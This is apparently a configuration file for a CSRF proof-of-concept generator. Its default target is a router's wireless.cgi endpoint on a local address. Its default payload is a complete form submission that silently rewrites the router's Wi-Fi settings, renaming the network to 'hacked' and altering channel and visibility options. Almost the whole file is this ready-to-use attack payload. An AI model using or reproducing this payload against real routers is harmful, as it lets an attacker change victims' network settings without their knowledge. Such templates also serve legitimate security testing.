{"command": {"url": {"default": "http://10.10.10.254/cgi-bin/wireless.cgi", "intro": "The target url or endpoint", "required": 1}, "payload": {"default": "page=basic&wlan_conf=rtdev&wirelessmode=14&bssid_num=1&mssid_0=hacked&sz11aChannel=149&radiohiddenButton=2&wifihiddenButton=2&mssid_1=&hssid=1&mssid_2=AlmondSetup3e40&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&DBDCEnabled=0&apisolated=0&mbssidapisolated=0&broadcastssid=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&vht_bandwidth=1&vht_stbc=0&vht_sgi=1&vht_bw_signal=0&vht_ldpc=0&tx_stream=2&rx_stream=2", "intro": "The CSRF payload", "required": 1}}, "version": "x.x", "intro": "This tool help you generate CSRF Poc HTML file", "name": "csrf", "links": ["https://google.com"]}